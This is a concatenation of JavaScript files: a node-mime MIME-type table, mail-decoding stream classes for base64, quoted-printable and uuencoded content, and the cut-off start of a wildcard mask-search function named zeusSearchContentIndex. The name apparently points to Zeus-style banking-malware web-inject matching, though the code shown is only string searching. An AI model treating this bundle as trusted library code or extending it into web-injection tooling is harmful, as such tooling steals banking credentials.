["esf"], "application/vnd.epson.msf": ["msf"], "application/vnd.epson.quickanime": ["qam"], "application/vnd.epson.salt": ["slt"], "application/vnd.epson.ssf": ["ssf"], "application/vnd.eszigno3+xml": ["es3", "et3"], "application/vnd.ezpix-album": ["ez2"], "application/vnd.ezpix-package": ["ez3"], "application/vnd.fdf": ["fdf"], "application/vnd.fdsn.mseed": ["mseed"], "application/vnd.fdsn.seed": ["seed", "dataless"], "application/vnd.flographit": ["gph"], "application/vnd.fluxtime.clip": ["ftc"], "application/vnd.framemaker": ["fm", "frame", "maker", "book"], "application/vnd.frogans.fnc": ["fnc"], "application/vnd.frogans.ltf": ["ltf"], "application/vnd.fsc.weblaunch": ["fsc"], "application/vnd.fujitsu.oasys": ["oas"], "application/vnd.fujitsu.oasys2": ["oa2"], "application/vnd.fujitsu.oasys3": ["oa3"], "application/vnd.fujitsu.oasysgp": ["fg5"], "application/vnd.fujitsu.oasysprs": ["bh2"], "application/vnd.fujixerox.ddd": ["ddd"], "application/vnd.fujixerox.docuworks": ["xdw"], "application/vnd.fujixerox.docuworks.binder": ["xbd"], "application/vnd.fuzzysheet": ["fzs"], "application/vnd.genomatix.tuxedo": ["txd"], "application/vnd.geogebra.file": ["ggb"], "application/vnd.geogebra.tool": ["ggt"], "application/vnd.geometry-explorer": ["gex", "gre"], "application/vnd.geonext": ["gxt"], "application/vnd.geoplan": ["g2w"], "application/vnd.geospace": ["g3w"], "application/vnd.gmx": ["gmx"], "application/vnd.google-earth.kml+xml": ["kml"], "application/vnd.google-earth.kmz": ["kmz"], "application/vnd.grafeq": ["gqf", "gqs"], "application/vnd.groove-account": ["gac"], "application/vnd.groove-help": ["ghf"], "application/vnd.groove-identity-message": ["gim"], "application/vnd.groove-injector": ["grv"], "application/vnd.groove-tool-message": ["gtm"], "application/vnd.groove-tool-template": ["tpl"], "application/vnd.groove-vcard": ["vcg"], "application/vnd.hal+xml": ["hal"], "application/vnd.handheld-entertainment+xml": ["zmm"], "application/vnd.hbci": ["hbci"], "application/vnd.hhe.lesson-player": ["les"], "application/vnd.hp-hpgl": ["hpgl"], "application/vnd.hp-hpid": ["hpid"], "application/vnd.hp-hps": ["hps"], "application/vnd.hp-jlyt": ["jlt"], "application/vnd.hp-pcl": ["pcl"], "application/vnd.hp-pclxl": ["pclxl"], "application/vnd.ibm.minipay": ["mpy"], "application/vnd.ibm.modcap": ["afp", "listafp", "list3820"], "application/vnd.ibm.rights-management": ["irm"], "application/vnd.ibm.secure-container": ["sc"], "application/vnd.iccprofile": ["icc", "icm"], "application/vnd.igloader": ["igl"], "application/vnd.immervision-ivp": ["ivp"], "application/vnd.immervision-ivu": ["ivu"], "application/vnd.insors.igm": ["igm"], "application/vnd.intercon.formnet": ["xpw", "xpx"], "application/vnd.intergeo": ["i2g"], "application/vnd.intu.qbo": ["qbo"], "application/vnd.intu.qfx": ["qfx"], "application/vnd.ipunplugged.rcprofile": ["rcprofile"], "application/vnd.irepository.package+xml": ["irp"], "application/vnd.is-xpr": ["xpr"], "application/vnd.isac.fcs": ["fcs"], "application/vnd.jam": ["jam"], "application/vnd.jcp.javame.midlet-rms": ["rms"], "application/vnd.jisp": ["jisp"], "application/vnd.joost.joda-archive": ["joda"], "application/vnd.kahootz": ["ktz", "ktr"], "application/vnd.kde.karbon": ["karbon"], "application/vnd.kde.kchart": ["chrt"], "application/vnd.kde.kformula": ["kfo"], "application/vnd.kde.kivio": ["flw"], "application/vnd.kde.kontour": ["kon"], "application/vnd.kde.kpresenter": ["kpr", "kpt"], "application/vnd.kde.kspread": ["ksp"], "application/vnd.kde.kword": ["kwd", "kwt"], "application/vnd.kenameaapp": ["htke"], "application/vnd.kidspiration": ["kia"], "application/vnd.kinar": ["kne", "knp"], "application/vnd.koan": ["skp", "skd", "skt", "skm"], "application/vnd.kodak-descriptor": ["sse"], "application/vnd.las.las+xml": ["lasxml"], "application/vnd.llamagraphics.life-balance.desktop": ["lbd"], "application/vnd.llamagraphics.life-balance.exchange+xml": ["lbe"], "application/vnd.lotus-1-2-3": ["123"], "application/vnd.lotus-approach": ["apr"], "application/vnd.lotus-freelance": ["pre"], "application/vnd.lotus-notes": ["nsf"], "application/vnd.lotus-organizer": ["org"], "application/vnd.lotus-screencam": ["scm"], "application/vnd.lotus-wordpro": ["lwp"], "application/vnd.macports.portpkg": ["portpkg"], "application/vnd.mcd": ["mcd"], "application/vnd.medcalcdata": ["mc1"], "application/vnd.mediastation.cdkey": ["cdkey"], "application/vnd.mfer": ["mwf"], "application/vnd.mfmp": ["mfm"], "application/vnd.micrografx.flo": ["flo"], "application/vnd.micrografx.igx": ["igx"], "application/vnd.mif": ["mif"], "application/vnd.mobius.daf": ["daf"], "application/vnd.mobius.dis": ["dis"], "application/vnd.mobius.mbk": ["mbk"], "application/vnd.mobius.mqy": ["mqy"], "application/vnd.mobius.msl": ["msl"], "application/vnd.mobius.plc": ["plc"], "application/vnd.mobius.txf": ["txf"], "application/vnd.mophun.application": ["mpn"], "application/vnd.mophun.certificate": ["mpc"], "application/vnd.mozilla.xul+xml": ["xul"], "application/vnd.ms-artgalry": ["cil"], "application/vnd.ms-cab-compressed": ["cab"], "application/vnd.ms-excel": ["xls", "xlm", "xla", "xlc", "xlt", "xlw"], "application/vnd.ms-excel.addin.macroenabled.12": ["xlam"], "application/vnd.ms-excel.sheet.binary.macroenabled.12": ["xlsb"], "application/vnd.ms-excel.sheet.macroenabled.12": ["xlsm"], "application/vnd.ms-excel.template.macroenabled.12": ["xltm"], "application/vnd.ms-fontobject": ["eot"], "application/vnd.ms-htmlhelp": ["chm"], "application/vnd.ms-ims": ["ims"], "application/vnd.ms-lrm": ["lrm"], "application/vnd.ms-officetheme": ["thmx"], "application/vnd.ms-pki.seccat": ["cat"], "application/vnd.ms-pki.stl": ["stl"], "application/vnd.ms-powerpoint": ["ppt", "pps", "pot"], "application/vnd.ms-powerpoint.addin.macroenabled.12": ["ppam"], "application/vnd.ms-powerpoint.presentation.macroenabled.12": ["pptm"], "application/vnd.ms-powerpoint.slide.macroenabled.12": ["sldm"], "application/vnd.ms-powerpoint.slideshow.macroenabled.12": ["ppsm"], "application/vnd.ms-powerpoint.template.macroenabled.12": ["potm"], "application/vnd.ms-project": ["mpp", "mpt"], "application/vnd.ms-word.document.macroenabled.12": ["docm"], "application/vnd.ms-word.template.macroenabled.12": ["dotm"], "application/vnd.ms-works": ["wps", "wks", "wcm", "wdb"], "application/vnd.ms-wpl": ["wpl"], "application/vnd.ms-xpsdocument": ["xps"], "application/vnd.mseq": ["mseq"], "application/vnd.musician": ["mus"], "application/vnd.muvee.style": ["msty"], "application/vnd.mynfc": ["taglet"], "application/vnd.neurolanguage.nlu": ["nlu"], "application/vnd.nitf": ["ntf", "nitf"], "application/vnd.noblenet-directory": ["nnd"], "application/vnd.noblenet-sealer": ["nns"], "application/vnd.noblenet-web": ["nnw"], "application/vnd.nokia.n-gage.data": ["ngdat"], "application/vnd.nokia.radio-preset": ["rpst"], "application/vnd.nokia.radio-presets": ["rpss"], "application/vnd.novadigm.edm": ["edm"], "application/vnd.novadigm.edx": ["edx"], "application/vnd.novadigm.ext": ["ext"], "application/vnd.oasis.opendocument.chart": ["odc"], "application/vnd.oasis.opendocument.chart-template": ["otc"], "application/vnd.oasis.opendocument.database": ["odb"], "application/vnd.oasis.opendocument.formula": ["odf"], "application/vnd.oasis.opendocument.formula-template": ["odft"], "application/vnd.oasis.opendocument.graphics": ["odg"], "application/vnd.oasis.opendocument.graphics-template": ["otg"], "application/vnd.oasis.opendocument.image": ["odi"], "application/vnd.oasis.opendocument.image-template": ["oti"], "application/vnd.oasis.opendocument.presentation": ["odp"], "application/vnd.oasis.opendocument.presentation-template": ["otp"], "application/vnd.oasis.opendocument.spreadsheet": ["ods"], "application/vnd.oasis.opendocument.spreadsheet-template": ["ots"], "application/vnd.oasis.opendocument.text": ["odt"], "application/vnd.oasis.opendocument.text-master": ["odm"], "application/vnd.oasis.opendocument.text-template": ["ott"], "application/vnd.oasis.opendocument.text-web": ["oth"], "application/vnd.olpc-sugar": ["xo"], "application/vnd.oma.dd2+xml": ["dd2"], "application/vnd.openofficeorg.extension": ["oxt"], "application/vnd.openxmlformats-officedocument.presentationml.presentation": ["pptx"], "application/vnd.openxmlformats-officedocument.presentationml.slide": ["sldx"], "application/vnd.openxmlformats-officedocument.presentationml.slideshow": ["ppsx"], "application/vnd.openxmlformats-officedocument.presentationml.template": ["potx"], "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet": ["xlsx"], "application/vnd.openxmlformats-officedocument.spreadsheetml.template": ["xltx"], "application/vnd.openxmlformats-officedocument.wordprocessingml.document": ["docx"], "application/vnd.openxmlformats-officedocument.wordprocessingml.template": ["dotx"], "application/vnd.osgeo.mapguide.package": ["mgp"], "application/vnd.osgi.dp": ["dp"], "application/vnd.osgi.subsystem": ["esa"], "application/vnd.palm": ["pdb", "pqa", "oprc"], "application/vnd.pawaafile": ["paw"], "application/vnd.pg.format": ["str"], "application/vnd.pg.osasli": ["ei6"], "application/vnd.picsel": ["efif"], "application/vnd.pmi.widget": ["wg"], "application/vnd.pocketlearn": ["plf"], "application/vnd.powerbuilder6": ["pbd"], "application/vnd.previewsystems.box": ["box"], "application/vnd.proteus.magazine": ["mgz"], "application/vnd.publishare-delta-tree": ["qps"], "application/vnd.pvi.ptid1": ["ptid"], "application/vnd.quark.quarkxpress": ["qxd", "qxt", "qwd", "qwt", "qxl", "qxb"], "application/vnd.realvnc.bed": ["bed"], "application/vnd.recordare.musicxml": ["mxl"], "application/vnd.recordare.musicxml+xml": ["musicxml"], "application/vnd.rig.cryptonote": ["cryptonote"], "application/vnd.rim.cod": ["cod"], "application/vnd.rn-realmedia": ["rm"], "application/vnd.rn-realmedia-vbr": ["rmvb"], "application/vnd.route66.link66+xml": ["link66"], "application/vnd.sailingtracker.track": ["st"], "application/vnd.seemail": ["see"], "application/vnd.sema": ["sema"], "application/vnd.semd": ["semd"], "application/vnd.semf": ["semf"], "application/vnd.shana.informed.formdata": ["ifm"], "application/vnd.shana.informed.formtemplate": ["itp"], "application/vnd.shana.informed.interchange": ["iif"], "application/vnd.shana.informed.package": ["ipk"], "application/vnd.simtech-mindmapper": ["twd", "twds"], "application/vnd.smaf": ["mmf"], "application/vnd.smart.teacher": ["teacher"], "application/vnd.solent.sdkm+xml": ["sdkm", "sdkd"], "application/vnd.spotfire.dxp": ["dxp"], "application/vnd.spotfire.sfs": ["sfs"], "application/vnd.stardivision.calc": ["sdc"], "application/vnd.stardivision.draw": ["sda"], "application/vnd.stardivision.impress": ["sdd"], "application/vnd.stardivision.math": ["smf"], "application/vnd.stardivision.writer": ["sdw", "vor"], "application/vnd.stardivision.writer-global": ["sgl"], "application/vnd.stepmania.package": ["smzip"], "application/vnd.stepmania.stepchart": ["sm"], "application/vnd.sun.xml.calc": ["sxc"], "application/vnd.sun.xml.calc.template": ["stc"], "application/vnd.sun.xml.draw": ["sxd"], "application/vnd.sun.xml.draw.template": ["std"], "application/vnd.sun.xml.impress": ["sxi"], "application/vnd.sun.xml.impress.template": ["sti"], "application/vnd.sun.xml.math": ["sxm"], "application/vnd.sun.xml.writer": ["sxw"], "application/vnd.sun.xml.writer.global": ["sxg"], "application/vnd.sun.xml.writer.template": ["stw"], "application/vnd.sus-calendar": ["sus", "susp"], "application/vnd.svd": ["svd"], "application/vnd.symbian.install": ["sis", "sisx"], "application/vnd.syncml+xml": ["xsm"], "application/vnd.syncml.dm+wbxml": ["bdm"], "application/vnd.syncml.dm+xml": ["xdm"], "application/vnd.tao.intent-module-archive": ["tao"], "application/vnd.tcpdump.pcap": ["pcap", "cap", "dmp"], "application/vnd.tmobile-livetv": ["tmo"], "application/vnd.trid.tpt": ["tpt"], "application/vnd.triscape.mxs": ["mxs"], "application/vnd.trueapp": ["tra"], "application/vnd.ufdl": ["ufd", "ufdl"], "application/vnd.uiq.theme": ["utz"], "application/vnd.umajin": ["umj"], "application/vnd.unity": ["unityweb"], "application/vnd.uoml+xml": ["uoml"], "application/vnd.vcx": ["vcx"], "application/vnd.visio": ["vsd", "vst", "vss", "vsw"], "application/vnd.visionary": ["vis"], "application/vnd.vsf": ["vsf"], "application/vnd.wap.wbxml": ["wbxml"], "application/vnd.wap.wmlc": ["wmlc"], "application/vnd.wap.wmlscriptc": ["wmlsc"], "application/vnd.webturbo": ["wtb"], "application/vnd.wolfram.player": ["nbp"], "application/vnd.wordperfect": ["wpd"], "application/vnd.wqd": ["wqd"], "application/vnd.wt.stf": ["stf"], "application/vnd.xara": ["xar"], "application/vnd.xfdl": ["xfdl"], "application/vnd.yamaha.hv-dic": ["hvd"], "application/vnd.yamaha.hv-script": ["hvs"], "application/vnd.yamaha.hv-voice": ["hvp"], "application/vnd.yamaha.openscoreformat": ["osf"], "application/vnd.yamaha.openscoreformat.osfpvg+xml": ["osfpvg"], "application/vnd.yamaha.smaf-audio": ["saf"], "application/vnd.yamaha.smaf-phrase": ["spf"], "application/vnd.yellowriver-custom-menu": ["cmp"], "application/vnd.zul": ["zir", "zirz"], "application/vnd.zzazz.deck+xml": ["zaz"], "application/voicexml+xml": ["vxml"], "application/widget": ["wgt"], "application/winhlp": ["hlp"], "application/wsdl+xml": ["wsdl"], "application/wspolicy+xml": ["wspolicy"], "application/x-7z-compressed": ["7z"], "application/x-abiword": ["abw"], "application/x-ace-compressed": ["ace"], "application/x-apple-diskimage": ["dmg"], "application/x-authorware-bin": ["aab", "x32", "u32", "vox"], "application/x-authorware-map": ["aam"], "application/x-authorware-seg": ["aas"], "application/x-bcpio": ["bcpio"], "application/x-bittorrent": ["torrent"], "application/x-blorb": ["blb", "blorb"], "application/x-bzip": ["bz"], "application/x-bzip2": ["bz2", "boz"], "application/x-cbr": ["cbr", "cba", "cbt", "cbz", "cb7"], "application/x-cdlink": ["vcd"], "application/x-cfs-compressed": ["cfs"], "application/x-chat": ["chat"], "application/x-chess-pgn": ["pgn"], "application/x-chrome-extension": ["crx"], "application/x-conference": ["nsc"], "application/x-cpio": ["cpio"], "application/x-csh": ["csh"], "application/x-debian-package": ["deb", "udeb"], "application/x-dgc-compressed": ["dgc"], "application/x-director": ["dir", "dcr", "dxr", "cst", "cct", "cxt", "w3d", "fgd", "swa"], "application/x-doom": ["wad"], "application/x-dtbncx+xml": ["ncx"], "application/x-dtbook+xml": ["dtb"], "application/x-dtbresource+xml": ["res"], "application/x-dvi": ["dvi"], "application/x-envoy": ["evy"], "application/x-eva": ["eva"], "application/x-font-bdf": ["bdf"], "application/x-font-ghostscript": ["gsf"], "application/x-font-linux-psf": ["psf"], "application/x-font-otf": ["otf"], "application/x-font-pcf": ["pcf"], "application/x-font-snf": ["snf"], "application/x-font-ttf": ["ttf", "ttc"], "application/x-font-type1": ["pfa", "pfb", "pfm", "afm"], "application/x-freearc": ["arc"], "application/x-futuresplash": ["spl"], "application/x-gca-compressed": ["gca"], "application/x-glulx": ["ulx"], "application/x-gnumeric": ["gnumeric"], "application/x-gramps-xml": ["gramps"], "application/x-gtar": ["gtar"], "application/x-hdf": ["hdf"], "application/x-install-instructions": ["install"], "application/x-iso9660-image": ["iso"], "application/x-java-jnlp-file": ["jnlp"], "application/x-latex": ["latex"], "application/x-lua-bytecode": ["luac"], "application/x-lzh-compressed": ["lzh", "lha"], "application/x-mie": ["mie"], "application/x-mobipocket-ebook": ["prc", "mobi"], "application/x-ms-application": ["application"], "application/x-ms-shortcut": ["lnk"], "application/x-ms-wmd": ["wmd"], "application/x-ms-wmz": ["wmz"], "application/x-ms-xbap": ["xbap"], "application/x-msaccess": ["mdb"], "application/x-msbinder": ["obd"], "application/x-mscardfile": ["crd"], "application/x-msclip": ["clp"], "application/x-msdownload": ["exe", "dll", "com", "bat", "msi"], "application/x-msmediaview": ["mvb", "m13", "m14"], "application/x-msmetafile": ["wmf", "wmz", "emf", "emz"], "application/x-msmoney": ["mny"], "application/x-mspublisher": ["pub"], "application/x-msschedule": ["scd"], "application/x-msterminal": ["trm"], "application/x-mswrite": ["wri"], "application/x-netcdf": ["nc", "cdf"], "application/x-nzb": ["nzb"], "application/x-pkcs12": ["p12", "pfx"], "application/x-pkcs7-certificates": ["p7b", "spc"], "application/x-pkcs7-certreqresp": ["p7r"], "application/x-rar-compressed": ["rar"], "application/x-research-info-systems": ["ris"], "application/x-sh": ["sh"], "application/x-shar": ["shar"], "application/x-shockwave-flash": ["swf"], "application/x-silverlight-app": ["xap"], "application/x-sql": ["sql"], "application/x-stuffit": ["sit"], "application/x-stuffitx": ["sitx"], "application/x-subrip": ["srt"], "application/x-sv4cpio": ["sv4cpio"], "application/x-sv4crc": ["sv4crc"], "application/x-t3vm-image": ["t3"], "application/x-tads": ["gam"], "application/x-tar": ["tar"], "application/x-tcl": ["tcl"], "application/x-tex": ["tex"], "application/x-tex-tfm": ["tfm"], "application/x-texinfo": ["texinfo", "texi"], "application/x-tgif": ["obj"], "application/x-ustar": ["ustar"], "application/x-wais-source": ["src"], "application/x-web-app-manifest+json": ["webapp"], "application/x-x509-ca-cert": ["der", "crt"], "application/x-xfig": ["fig"], "application/x-xliff+xml": ["xlf"], "application/x-xpinstall": ["xpi"], "application/x-xz": ["xz"], "application/x-zmachine": ["z1", "z2", "z3", "z4", "z5", "z6", "z7", "z8"], "application/xaml+xml": ["xaml"], "application/xcap-diff+xml": ["xdf"], "application/xenc+xml": ["xenc"], "application/xhtml+xml": ["xhtml", "xht"], "application/xml": ["xml", "xsl", "xsd"], "application/xml-dtd": ["dtd"], "application/xop+xml": ["xop"], "application/xproc+xml": ["xpl"], "application/xslt+xml": ["xslt"], "application/xspf+xml": ["xspf"], "application/xv+xml": ["mxml", "xhvml", "xvml", "xvm"], "application/yang": ["yang"], "application/yin+xml": ["yin"], "application/zip": ["zip"], "audio/adpcm": ["adp"], "audio/basic": ["au", "snd"], "audio/midi": ["mid", "midi", "kar", "rmi"], "audio/mp4": ["mp4a", "m4a"], "audio/mpeg": ["mpga", "mp2", "mp2a", "mp3", "m2a", "m3a"], "audio/ogg": ["oga", "ogg", "spx"], "audio/s3m": ["s3m"], "audio/silk": ["sil"], "audio/vnd.dece.audio": ["uva", "uvva"], "audio/vnd.digital-winds": ["eol"], "audio/vnd.dra": ["dra"], "audio/vnd.dts": ["dts"], "audio/vnd.dts.hd": ["dtshd"], "audio/vnd.lucent.voice": ["lvp"], "audio/vnd.ms-playready.media.pya": ["pya"], "audio/vnd.nuera.ecelp4800": ["ecelp4800"], "audio/vnd.nuera.ecelp7470": ["ecelp7470"], "audio/vnd.nuera.ecelp9600": ["ecelp9600"], "audio/vnd.rip": ["rip"], "audio/webm": ["weba"], "audio/x-aac": ["aac"], "audio/x-aiff": ["aif", "aiff", "aifc"], "audio/x-caf": ["caf"], "audio/x-flac": ["flac"], "audio/x-matroska": ["mka"], "audio/x-mpegurl": ["m3u"], "audio/x-ms-wax": ["wax"], "audio/x-ms-wma": ["wma"], "audio/x-pn-realaudio": ["ram", "ra"], "audio/x-pn-realaudio-plugin": ["rmp"], "audio/x-wav": ["wav"], "audio/xm": ["xm"], "chemical/x-cdx": ["cdx"], "chemical/x-cif": ["cif"], "chemical/x-cmdf": ["cmdf"], "chemical/x-cml": ["cml"], "chemical/x-csml": ["csml"], "chemical/x-xyz": ["xyz"], "font/opentype": ["otf"], "image/bmp": ["bmp"], "image/cgm": ["cgm"], "image/g3fax": ["g3"], "image/gif": ["gif"], "image/ief": ["ief"], "image/jpeg": ["jpeg", "jpg", "jpe"], "image/ktx": ["ktx"], "image/png": ["png"], "image/prs.btif": ["btif"], "image/sgi": ["sgi"], "image/svg+xml": ["svg", "svgz"], "image/tiff": ["tiff", "tif"], "image/vnd.adobe.photoshop": ["psd"], "image/vnd.dece.graphic": ["uvi", "uvvi", "uvg", "uvvg"], "image/vnd.djvu": ["djvu", "djv"], "image/vnd.dvb.subtitle": ["sub"], "image/vnd.dwg": ["dwg"], "image/vnd.dxf": ["dxf"], "image/vnd.fastbidsheet": ["fbs"], "image/vnd.fpx": ["fpx"], "image/vnd.fst": ["fst"], "image/vnd.fujixerox.edmics-mmr": ["mmr"], "image/vnd.fujixerox.edmics-rlc": ["rlc"], "image/vnd.ms-modi": ["mdi"], "image/vnd.ms-photo": ["wdp"], "image/vnd.net-fpx": ["npx"], "image/vnd.wap.wbmp": ["wbmp"], "image/vnd.xiff": ["xif"], "image/webp": ["webp"], "image/x-3ds": ["3ds"], "image/x-cmu-raster": ["ras"], "image/x-cmx": ["cmx"], "image/x-freehand": ["fh", "fhc", "fh4", "fh5", "fh7"], "image/x-icon": ["ico"], "image/x-mrsid-image": ["sid"], "image/x-pcx": ["pcx"], "image/x-pict": ["pic", "pct"], "image/x-portable-anymap": ["pnm"], "image/x-portable-bitmap": ["pbm"], "image/x-portable-graymap": ["pgm"], "image/x-portable-pixmap": ["ppm"], "image/x-rgb": ["rgb"], "image/x-tga": ["tga"], "image/x-xbitmap": ["xbm"], "image/x-xpixmap": ["xpm"], "image/x-xwindowdump": ["xwd"], "message/rfc822": ["eml", "mime"], "model/iges": ["igs", "iges"], "model/mesh": ["msh", "mesh", "silo"], "model/vnd.collada+xml": ["dae"], "model/vnd.dwf": ["dwf"], "model/vnd.gdl": ["gdl"], "model/vnd.gtw": ["gtw"], "model/vnd.mts": ["mts"], "model/vnd.vtu": ["vtu"], "model/vrml": ["wrl", "vrml"], "model/x3d+binary": ["x3db", "x3dbz"], "model/x3d+vrml": ["x3dv", "x3dvz"], "model/x3d+xml": ["x3d", "x3dz"], "text/cache-manifest": ["appcache", "manifest"], "text/calendar": ["ics", "ifb"], "text/coffeescript": ["coffee"], "text/css": ["css"], "text/csv": ["csv"], "text/hjson": ["hjson"], "text/html": ["html", "htm"], "text/jade": ["jade"], "text/jsx": ["jsx"], "text/less": ["less"], "text/n3": ["n3"], "text/plain": ["txt", "text", "conf", "def", "list", "log", "in", "ini"], "text/prs.lines.tag": ["dsc"], "text/richtext": ["rtx"], "text/sgml": ["sgml", "sgm"], "text/stylus": ["stylus", "styl"], "text/tab-separated-values": ["tsv"], "text/troff": ["t", "tr", "roff", "man", "me", "ms"], "text/turtle": ["ttl"], "text/uri-list": ["uri", "uris", "urls"], "text/vcard": ["vcard"], "text/vnd.curl": ["curl"], "text/vnd.curl.dcurl": ["dcurl"], "text/vnd.curl.mcurl": ["mcurl"], "text/vnd.curl.scurl": ["scurl"], "text/vnd.dvb.subtitle": ["sub"], "text/vnd.fly": ["fly"], "text/vnd.fmi.flexstor": ["flx"], "text/vnd.graphviz": ["gv"], "text/vnd.in3d.3dml": ["3dml"], "text/vnd.in3d.spot": ["spot"], "text/vnd.sun.j2me.app-descriptor": ["jad"], "text/vnd.wap.wml": ["wml"], "text/vnd.wap.wmlscript": ["wmls"], "text/vtt": ["vtt"], "text/x-asm": ["s", "asm"], "text/x-c": ["c", "cc", "cxx", "cpp", "h", "hh", "dic"], "text/x-component": ["htc"], "text/x-fortran": ["f", "for", "f77", "f90"], "text/x-handlebars-template": ["hbs"], "text/x-java-source": ["java"], "text/x-lua": ["lua"], "text/x-markdown": ["markdown", "md", "mkd"], "text/x-nfo": ["nfo"], "text/x-opml": ["opml"], "text/x-pascal": ["p", "pas"], "text/x-sass": ["sass"], "text/x-scss": ["scss"], "text/x-setext": ["etx"], "text/x-sfv": ["sfv"], "text/x-uuencode": ["uu"], "text/x-vcalendar": ["vcs"], "text/x-vcard": ["vcf"], "text/yaml": ["yaml", "yml"], "video/3gpp": ["3gp"], "video/3gpp2": ["3g2"], "video/h261": ["h261"], "video/h263": ["h263"], "video/h264": ["h264"], "video/jpeg": ["jpgv"], "video/jpm": ["jpm", "jpgm"], "video/mj2": ["mj2", "mjp2"], "video/mp2t": ["ts"], "video/mp4": ["mp4", "mp4v", "mpg4"], "video/mpeg": ["mpeg", "mpg", "mpe", "m1v", "m2v"], "video/ogg": ["ogv"], "video/quicktime": ["qt", "mov"], "video/vnd.dece.hd": ["uvh", "uvvh"], "video/vnd.dece.mobile": ["uvm", "uvvm"], "video/vnd.dece.pd": ["uvp", "uvvp"], "video/vnd.dece.sd": ["uvs", "uvvs"], "video/vnd.dece.video": ["uvv", "uvvv"], "video/vnd.dvb.file": ["dvb"], "video/vnd.fvt": ["fvt"], "video/vnd.mpegurl": ["mxu", "m4u"], "video/vnd.ms-playready.media.pyv": ["pyv"], "video/vnd.uvvu.mp4": ["uvu", "uvvu"], "video/vnd.vivo": ["viv"], "video/webm": ["webm"], "video/x-f4v": ["f4v"], "video/x-fli": ["fli"], "video/x-flv": ["flv"], "video/x-m4v": ["m4v"], "video/x-matroska": ["mkv", "mk3d", "mks"], "video/x-mng": ["mng"], "video/x-ms-asf": ["asf", "asx"], "video/x-ms-vob": ["vob"], "video/x-ms-wm": ["wm"], "video/x-ms-wmv": ["wmv"], "video/x-ms-wmx": ["wmx"], "video/x-ms-wvx": ["wvx"], "video/x-msvideo": ["avi"], "video/x-sgi-movie": ["movie"], "video/x-smv": ["smv"], "x-conference/x-cooltalk": ["ice"] });


mime.default_type = mime.lookup('bin');





mime.Mime = Mime;


mime.charsets = {
  lookup: function(mimeType, fallback) {
    
    return (/^text\//).test(mimeType) ? 'UTF-8' : fallback;
  }
};

module.exports = mime;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     

========

var Stream = require('stream').Stream;
var utillib = require('util');
var mimelib = require("mimelib");
var encodinglib = require("encoding");

var crypto = require("crypto");
var uue = require('uue');


function Base64Stream() {
    Stream.call(this);
    this.writable = true;

    this.checksum = crypto.createHash("md5");
    this.length = 0;

    this.current = "";
}

utillib.inherits(Base64Stream, Stream);

Base64Stream.prototype.write = function(data) {
    this.handleInput(data);
    return true;
};

Base64Stream.prototype.end = function(data) {
    this.handleInput(data);
    this.emit("end");
    return {
        length: this.length,
        checksum: this.checksum.digest("hex")
    };
};

Base64Stream.prototype.handleInput = function(data) {
    if (!data || !data.length) {
        return;
    }

    data = (data || "").toString("utf-8");

    var remainder = 0;
    this.current += data.replace(/[^\w\+\/=]/g, '');
    var buffer = new Buffer(this.current.substr(0, this.current.length - this.current.length % 4), "base64");
    if (buffer.length) {
        this.length += buffer.length;
        this.checksum.update(buffer);
        this.emit("data", buffer);
    }
    this.current = (remainder = this.current.length % 4) ? this.current.substr(-remainder) : "";
};

function QPStream(charset) {
    Stream.call(this);
    this.writable = true;

    this.checksum = crypto.createHash("md5");
    this.length = 0;

    this.charset = charset || "UTF-8";
    this.current = undefined;
}
utillib.inherits(QPStream, Stream);

QPStream.prototype.write = function(data) {
    this.handleInput(data);
    return true;
};

QPStream.prototype.end = function(data) {
    this.handleInput(data);
    this.flush();
    this.emit("end");
    return {
        length: this.length,
        checksum: this.checksum.digest("hex")
    };
};

QPStream.prototype.handleInput = function(data) {
    if (!data || !data.length) {
        return;
    }

    data = (data || "").toString("utf-8");
    if (data.match(/^\r\n/)) {
        data = data.substr(2);
    }

    if (typeof this.current != "string") {
        this.current = data;
    } else {
        this.current += "\r\n" + data;
    }
};

QPStream.prototype.flush = function() {
    var buffer = mimelib.decodeQuotedPrintable(this.current, false, this.charset);

    if (this.charset.toLowerCase() == "binary") {
        
    } else if (this.charset.toLowerCase() != "utf-8") {
        buffer = encodinglib.convert(buffer, "utf-8", this.charset);
    } else {
        buffer = new Buffer(buffer, "utf-8");
    }

    this.length += buffer.length;
    this.checksum.update(buffer);

    this.emit("data", buffer);
};

function BinaryStream(charset) {
    Stream.call(this);
    this.writable = true;

    this.checksum = crypto.createHash("md5");
    this.length = 0;

    this.charset = charset || "UTF-8";
    this.current = "";
}
utillib.inherits(BinaryStream, Stream);

BinaryStream.prototype.write = function(data) {
    if (data && data.length) {
        this.length += data.length;
        this.checksum.update(data);
        this.emit("data", data);
    }
    return true;
};

BinaryStream.prototype.end = function(data) {
    if (data && data.length) {
        this.emit("data", data);
    }
    this.emit("end");
    return {
        length: this.length,
        checksum: this.checksum.digest("hex")
    };
};


function UUEStream(charset) {
    Stream.call(this);
    this.writable = true;

    this.checksum = crypto.createHash("md5");
    this.length = 0;
    this.buf = [];
    this.buflen = 0;

    this.charset = charset || "UTF-8";
    this.current = undefined;
}
utillib.inherits(UUEStream, Stream);

UUEStream.prototype.write = function(data) {
    this.buf.push(data);
    this.buflen += data.length;
    return true;
};

UUEStream.prototype.end = function(data) {
    if (data) {
        this.write(data);
    }

    this.flush();

    this.emit("end");
    return {
        length: this.length,
        checksum: this.checksum.digest("hex")
    };
};

UUEStream.prototype.flush = function() {
    var buffer = this.decode(Buffer.concat(this.buf, this.buflen));

    this.length += buffer.length;
    this.checksum.update(buffer);

    this.emit("data", buffer);
};

UUEStream.prototype.decode = function(buffer) {
    var filename;

    var re = /^begin [0-7]{3} (.*)/;
    filename = buffer.slice(0, Math.min(buffer.length, 1024)).toString().match(re)[1] || '';
    if (!filename) {
        return new Buffer(0);
    }

    buffer = uue.decodeFile(buffer.toString('ascii').replace(/\r\n/g, '\n'), filename);

    if (this.charset.toLowerCase() == "binary") {
        
    } else if (this.charset.toLowerCase() != "utf-8") {
        buffer = encodinglib.convert(buffer, "utf-8", this.charset);
    }

    return buffer;
};

exports.Base64Stream = Base64Stream;
exports.QPStream = QPStream;
exports.BinaryStream = BinaryStream;
exports.UUEStream = UUEStream;
                                                                                        

========

function zeusSearchContentIndex(data, mask, startOffset) {
    var searchParts = mask.split('*');
    var firstIndex = data.indexOf(searchParts[0], startOffset);
    var lstIndex = firstIndex + searchParts[0].length;
    var result;

    for (var i = 1; i < searchParts.length; i++) {
        lstIndex = data.indexOf(searchParts[i], lstIndex);
        if (lstIndex === -1) {
            break;
        }

        lstIndex += searchParts[i].length;
    }

